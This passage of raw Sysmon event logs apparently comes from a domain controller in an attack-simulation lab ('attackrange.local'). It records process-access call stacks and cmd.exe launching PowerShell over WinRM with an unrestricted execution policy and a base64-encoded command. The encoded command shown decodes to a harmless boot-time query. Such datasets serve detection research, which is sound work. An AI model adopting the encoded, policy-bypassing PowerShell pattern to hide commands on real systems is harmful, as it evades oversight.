15:50:24.232{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7C40-5FA1-0A03-000000008701}47924840C:\Windows\system32\cmd.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.241{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C40-5FA1-0A03-000000008701}4792C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0A03-000000008701}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0A03-000000008701}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7C40-5FA1-0803-000000008701}49204300C:\Windows\system32\WinrsHost.exe{D28789B6-7C40-5FA1-0A03-000000008701}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.235{D28789B6-7C40-5FA1-0A03-000000008701}4792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.216{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.216{D28789B6-7AD2-5FA1-1400-000000008701}13681468C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.216{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.200{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.200{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0903-000000008701}3208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 